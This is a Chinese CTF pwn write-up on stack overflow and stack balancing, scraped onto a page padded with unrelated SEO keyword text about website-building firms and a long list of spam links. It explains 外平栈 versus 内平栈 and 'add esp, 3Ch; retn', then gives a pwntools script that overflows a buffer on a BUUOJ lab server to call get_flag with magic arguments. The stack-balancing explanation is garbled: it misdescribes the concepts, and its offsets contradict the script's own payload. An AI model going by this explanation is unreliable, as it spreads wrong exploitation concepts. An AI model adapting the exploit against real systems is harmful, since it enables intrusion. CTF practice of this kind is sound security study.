当前位置: 首页 > wzjs >正文

上海网站商城建设公司吗新手如何找cps推广渠道

上海网站商城建设公司吗,新手如何找cps推广渠道,学校英文网站建设申请,网站建设那家公司好栈溢出外平栈 1外平栈与内平栈的区别 外平栈: 栈帧的局部变量和返回地址之间没有额外的对齐或填充。返回地址直接位于局部变量的上方(即栈顶方向)。在计算偏移时,不需要额外加 4(因为返回地址紧邻局部变量&#xff09…

栈溢出+外平栈

1外平栈与内平栈的区别

  • 外平栈

    • 栈帧的局部变量和返回地址之间没有额外的对齐或填充。
    • 返回地址直接位于局部变量的上方(即栈顶方向)。
    • 在计算偏移时,不需要额外加 4(因为返回地址紧邻局部变量)。
  • 内平栈

    • 栈帧的局部变量和返回地址之间可能存在对齐或填充(例如,编译器为了对齐而插入的额外空间)。
    • 返回地址与局部变量之间有一定的距离。
    • 在计算偏移时,需要额外加 4(或其他值,具体取决于对齐方式)。

2. add esp, 3Ch; retn 的作用

  • add esp, 3Ch:释放栈上分配的 60 字节空间(3Ch = 60)。
  • retn:从栈顶弹出返回地址并跳转到该地址。

在漏洞利用中,这两条指令通常用于调整栈指针并返回到攻击者控制的地址。


3. 外平栈与内平栈的偏移计算

假设有以下栈布局:

外平栈布局:
+-----------------+
| 局部变量        |  <- esp + 0
+-----------------+
| 返回地址        |  <- esp + 60 (3Ch)
+-----------------+
  • 局部变量与返回地址之间没有额外空间。
  • 在计算偏移时,直接使用 offset = 60,不需要额外加 4。
内平栈布局:
+-----------------+
| 局部变量        |  <- esp + 0
+-----------------+
| 对齐填充        |  <- esp + 60 (3Ch)
+-----------------+
| 返回地址        |  <- esp + 64 (40h)
+-----------------+
  • 局部变量与返回地址之间有 4 字节的对齐填充。
  • 在计算偏移时,需要额外加 4,即 offset = 64

from pwn import *
io = remote("node5.buuoj.cn",28027)
payload = b'a'*56
# get_flag_addr:0x080489A0,exit_addr:0x0804E6A0
payload += p32(0x080489A0) + p32(0x0804E6A0) 
payload += p32(0x308CD64F) + p32(0x195719D1)
io.sendline(payload)
io.interactive()

http://www.dtcms.com/wzjs/326500.html

相关文章:

  • 线上小程序制作google seo 优化招聘
  • 珠海网站建设专线以品牌推广为目的的广告网络平台
  • 沈阳网站建设的价格浏览器看b站
  • 用腾讯云怎么建设网站沈阳关键词优化报价
  • 创建平台网站下载链接网站开发详细流程
  • 人人车网站建设费用seo的优化策略有哪些
  • 外贸型网站方案广州番禺发布网
  • 宜春市住房和城乡建设局网站百度推广软件
  • vps建设网站需要条件杭州seo排名优化
  • 虚拟主机怎么搭建网站济南头条今日新闻
  • 论坛网站免费建设模板下载百度竞价排名查询网站
  • 网站建设教程书籍搜狗网页
  • 深圳网站建设单位网络营销发展现状与趋势
  • 昆明网站制作公司焊工培训班
  • 基于html5设计的网站建设最新百度新闻
  • 如果做好招聘网站建设搜索引擎优化效果
  • 做网站应该注意哪些方面重庆网站搜索引擎seo
  • 武汉专业建网站网店代运营骗局流程
  • 怎么做网站流量统计分析百度搜索app
  • No酒店网站建设对网络营销的认识
  • 中原区快速建站公司电话最新网站查询
  • 做外贸常用的网站备案域名交易平台
  • 企业宣传网站模板下载怎么在网络上推广
  • 做论文常用网站有哪些永州网站seo
  • 大连网站建设营销网站建设门户
  • 合肥注册公司流程和费用电脑优化大师有用吗
  • 注册公司网站需要多少钱百度推广官网入口
  • 嘉定营销型 网站制作启动互联全网营销推广
  • 网站的根目录是什么app排名优化公司
  • 扬州做网站的建站服务